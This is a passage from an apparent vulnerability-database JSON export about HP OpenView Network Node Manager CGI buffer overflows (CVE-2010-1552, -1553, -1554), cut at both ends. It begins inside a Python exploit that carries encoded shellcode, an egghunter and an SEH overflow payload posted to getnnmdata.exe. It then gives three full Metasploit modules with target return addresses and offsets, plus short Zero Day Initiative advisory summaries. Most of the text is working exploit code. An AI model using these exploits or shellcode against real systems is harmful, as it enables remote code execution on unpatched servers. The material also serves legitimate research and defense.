(\r\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\r\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\r\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\r\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\r\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\r\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\r\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\r\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\r\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\r\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\r\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\r\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\r\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\r\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\r\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\r\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\r\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\r\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\r\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\r\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\r\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\r\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\r\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\r\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\r\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\r\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\r\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\r\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\r\n)\r\n\r\negghunter = (\r\n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\"\r\n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\"\r\n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\"\r\n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\"\r\n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp = \"\\x74\\x21\\x44\\x44\"\r\n\r\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\r\n\r\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint \"\\nDone\\n\" \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14180/"}, {"lastseen": "2016-02-02T07:05:21", "description": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow. CVE-2010-1552. Remote exploit for windows platform", "published": "2011-03-23T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2011-03-23T00:00:00", "id": "EDB-ID:17039", "href": "https://www.exploit-db.com/exploits/17039/", "sourceData": "##\r\n# $Id: hp_nnm_snmpviewer_actapp.rb 12098 2011-03-23 15:47:20Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\r\n\t\t\t\tprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\r\n\t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\r\n\t\t\t\tcode.\r\n\r\n\t\t\t\tThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a\r\n\t\t\t\ttimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\r\n\t\t\t\tor POST request. The request must contain 'act' and 'app' parameters which, when\r\n\t\t\t\tcombined, total more than the 1024 byte stack buffer can hold.\r\n\r\n\t\t\t\tIt is important to note that this vulnerability must be exploited by overwriting SEH.\r\n\t\t\t\tWhile the saved return address can be smashed, a function call that occurs before\r\n\t\t\t\tthe function returns calls \"exit\".\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12098 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1552' ],\r\n\t\t\t\t\t[ 'OSVDB', '64975' ],\r\n\t\t\t\t\t[ 'BID', '40068' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-083/' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024, # 1024 byte buffer..\r\n\t\t\t\t\t'BadChars' =>\r\n\t\t\t\t\t\t# Not sure why this one has a different set of bad chars...\r\n\t\t\t\t\t\t(\r\n\t\t\t\t\t\t\t(0x00..0x08).to_a + (0x0b..0x1f).to_a +\r\n\t\t\t\t\t\t\t[ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ]\r\n\t\t\t\t\t\t).pack('C*'),\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t# Manually use FPU to get EIP into ECX\r\n\t\t\t\t\t'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\r\n\t\t\t\t\t'EncoderOptions' => { 'BufferRegister' => 'ecx' },\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Debug Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef, # crasher\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tcgi = '/OvCgi/snmpviewer.exe'\r\n\r\n\t\t# \"ins\" must be \"load\" or \"content\"\r\n\t\tins_ok = [ 'load', 'content' ]\r\n\t\tins = ins_ok[rand(ins_ok.length)]\r\n\r\n\t\tstart = 'The specified Application/Action name is not defined.<p>Application:\"'\r\n\t\t#middle = '\"<p>Action:\"'\r\n\r\n\t\tia32 = Metasm::Ia32.new\r\n\r\n\t\t# SEH\r\n\t\tseh_offset = 1192\r\n\t\tseh_frame = rand_text(8)\r\n\r\n\t\t# Jump back to the payload, after p/p/r jumps to us.\r\n\t\tdistance = seh_offset - start.length + seh_frame.length # dry run\r\n\t\tjmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\r\n\t\tdistance = seh_offset - start.length - jmp_back.length\r\n\t\tdistance += 8 if ins == 'content'\r\n\t\tjmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\t# A short jump back to the long jump back :)\r\n\t\tjmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string\r\n\r\n\t\t# Fix up the SEH frame\r\n\t\tseh_frame[0,jmp_small.length] = jmp_small\r\n\t\tseh_frame[4,4] = [target.ret].pack('V')\r\n\r\n\t\t# Create the buffer\r\n\t\tbuf = ''\r\n\t\tbuf << payload.encoded\r\n\t\tpad = seh_offset - start.length - buf.length - jmp_back.length\r\n\t\tpad += 8 if ins == 'content'\r\n\t\tbuf << rand_text(pad)\r\n\t\tbuf << jmp_back\r\n\t\tbuf << seh_frame\r\n\r\n\t\tapp = buf\r\n\r\n\t\t# Force an exception writing off the end of the stack\r\n\t\taction = rand_text(1024)\r\n\r\n\t\t# Send the request\r\n\t\tif rand(2) > 0\r\n\t\t\tprint_status(\"Sending exploit via POST request (ins=#{ins})...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => \"POST\",\r\n\t\t\t\t'vars_post' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ins' => ins,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'app' => app\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\telse\r\n\t\t\tprint_status(\"Sending exploit via GET request (ins=#{ins})...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => \"GET\",\r\n\t\t\t\t'vars_get' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ins' => ins,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'app' => app\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\tend\r\n\r\n\t\tif res and res.code != 502\r\n\t\t\tprint_error(\"Eek! We weren't expecting a response, but we got one\")\r\n\t\t\tprint_status(res.inspect) if datastore['NNM_DEBUG']\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef wfs_delay\r\n\t\t5\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17039/"}], "zdi": [{"lastseen": "2020-06-22T11:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2010-1554"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getnnmdata.exe CGI. If this CGI is requested with an invalid iCount POST parameter a sprintf() call is made to log the error. However, no length check is performed on the variable contents before copying in to a fixed-length stack buffer. This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-085/", "id": "ZDI-10-085", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-1553"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getnnmdata.exe CGI. If this CGI is requested with an invalid MaxAge parameter a sprintf() call is made to log the error. However, no length check is performed on the variable contents before copying in to a fixed-length stack buffer. This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-084/", "id": "ZDI-10-084", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:00", "bulletinFamily": "info", "cvelist": ["CVE-2010-1550"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovet_demandpoll.exe process. This process can be started by invoking the webappmon.exe CGI application through the webserver. The process calls vnsprintf() directly with the contents of the 'sel' POST variable. By providing a malicious value this format string vulnerability can be leveraged by remote attackers to execute arbitrary code under the context of the ovet_demandpoll.exe process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-081/", "id": "ZDI-10-081", "title": "HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:11", "bulletinFamily": "info", "cvelist": ["CVE-2010-1552"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the snmpviewer.exe CGI. The doLoad function in this process calls sprintf() with a %s format specifier and unsanitized user input retrieved from two separate POST variables (act and app). By providing large enough strings a remote attacker can cause a stack-based buffer overflow and eventually execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-083/", "id": "ZDI-10-083", "title": "HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:17", "bulletinFamily": "info", "cvelist": ["CVE-2010-1551"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Network Monitor (netmon.exe) daemon. This process can be started by invoking the webappmon.exe CGI application through the webserver. When the _OVParseLLA function defined within ov.dll is called from netmon.exe it directly copies the value of the 'sel' POST variable into a fixed-length stack buffer with a call to strcpy(). This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.", "modified": "2010-06-22T00:00:00", "published": "2010-05-11T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-082/", "id": "ZDI-10-082", "title": "HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-06T23:01:43", "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.\n", "published": "2011-03-23T21:57:16", "type": "metasploit", "title": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_ICOUNT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1554' ],\n [ 'OSVDB', '64976' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\n 'DisableNops' => 'True',\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ],\n [ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n egg = rand_text_alpha_upper(4)\n\n hunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n hunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n boom = rand_text_alpha_upper(target['Offset'])\n boom << generate_seh_record(target.ret)\n boom << hunter + egg + egg\n boom << payload.encoded\n boom << rand_text_alpha_upper(9024 - payload.encoded.length)\n\n sploit = \"SnmpVals=&ICount=-9#{boom}\"\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_cgi({\n 'uri'\t\t=> '/OvCgi/getnnmdata.exe',\n 'method'\t=> 'POST',\n 'data'\t\t=> sploit\n }, 8)\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb"}, {"lastseen": "2020-08-27T01:41:50", "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.\n", "published": "2011-03-23T21:57:16", "type": "metasploit", "title": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_MAXAGE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1553' ],\n [ 'OSVDB', '64976' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\n 'DisableNops' => 'True',\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],\n [ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n egg = rand_text_alpha_upper(4)\n\n hunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n hunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n boom = rand_text_alpha_upper(target['Offset'])\n boom << generate_seh_record(target.ret)\n boom << hunter + egg + egg\n boom << payload.encoded\n boom << rand_text_alpha_upper(9024 - payload.encoded.length)\n\n sploit = \"SnmpVals=&MaxAge=#{boom}\"\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_cgi({\n 'uri'\t\t=> '/OvCgi/getnnmdata.exe',\n 'method'\t=> 'POST',\n 'data'\t\t=> sploit\n }, 8)\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb"}, {"lastseen": "2020-08-12T22:10:37", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within a function within \"snmpviewer.exe\" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. While the saved return address can be smashed, a function call that occurs before the function returns calls \"exit\".\n", "published": "2011-03-23T15:47:20", "type": "metasploit", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMPVIEWER_ACTAPP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1552' ],\n [ 'OSVDB', '64975' ],\n [ 'BID', '40068' ],\n [ 'ZDI', '10-083' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024, # 1024 byte buffer..\n 'BadChars' =>\n # Not sure why this one has a different set of bad chars...\n (\n (0x00..0x08).to_a + (0x0b..0x1f).to_a +\n [ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ]\n ).pack('C*'),\n 'DisableNops' => true,\n # Manually use FPU to get EIP into ECX\n 'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\n 'EncoderOptions' => { 